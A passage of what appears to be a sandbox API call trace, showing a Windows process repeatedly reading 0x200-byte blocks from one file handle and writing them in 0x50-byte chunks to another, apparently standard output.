lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, 
lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.853] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.853] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 
[0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] GetFileType (hFile=0x50) returned 0x1 [0142.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.853] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, 
lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.854] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.854] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] GetFileType (hFile=0x50) returned 0x1 [0142.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.854] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] GetFileType (hFile=0x50) returned 0x1 [0142.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.855] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=4) returned 0x58 
[0142.856] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.856] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, 
lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.856] GetFileType (hFile=0x50) returned 0x1 [0142.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.857] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] GetFileType (hFile=0x50) returned 0x1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.857] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 
0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] GetFileType (hFile=0x50) returned 0x1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.858] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.858] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) 
returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] GetFileType (hFile=0x50) returned 0x1 [0142.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.859] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0142.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.860] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.860] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.861] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.861] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.861] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType 
(hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, 